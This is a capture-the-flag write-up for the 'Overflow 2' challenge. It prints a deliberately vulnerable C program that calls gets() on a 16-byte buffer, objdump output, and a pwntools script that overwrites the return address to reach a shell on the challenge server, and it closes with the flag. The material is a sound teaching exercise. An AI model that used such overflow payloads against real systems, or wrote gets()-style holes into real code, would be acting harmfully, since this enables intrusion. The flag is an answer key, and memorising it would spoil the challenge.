Rating:
# Overflow 2 (225 points)
## Description
ez overflow (or is it?)
nc cyberyoddha.baycyber.net 10002
## Solution
Here is the file we were given.
```c
void run_shell(){
system("/bin/sh");
}
void vuln(){
char buf[16];
gets(buf);
}
int main(void) {
vuln();
}
```
So we need to jump over to **run_shell** function using buffer overflow.
[Writeup for a similar task](https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/)
Let's find address of **run_shell** function using **objdump**
```shell
$ objdump -d overflow2
...
08049172 <run_shell>:
8049172: 55 push %ebp
8049173: 89 e5 mov %esp,%ebp
8049175: 53 push %ebx
8049176: 83 ec 04 sub $0x4,%esp
8049179: e8 63 00 00 00 call 80491e1 <__x86.get_pc_thunk.ax>
804917e: 05 82 2e 00 00 add $0x2e82,%eax
8049183: 83 ec 0c sub $0xc,%esp
...
```
Address is **0x8049172** and buffer size is 28. Now let's open python and write another script:
```python
from pwn import *
payload = "A"*28
payload += p32(0x8049172)
s = remote("cyberyoddha.baycyber.net", 10002)
s.sendline(payload)
s.interactive()
```
```shell
$ python overflow2.py
[+] Opening connection to cyberyoddha.baycyber.net on port 10002: Done
[*] Switching to interactive mode
$ ls
flag.txt
overflow2
$ cat flag.txt
CYCTF{0v3rfl0w!ng_v@ri@bl3$_i$_3z}
```
Flag: CYCTF{0v3rfl0w!ng_v@ri@bl3$_i$_3z}
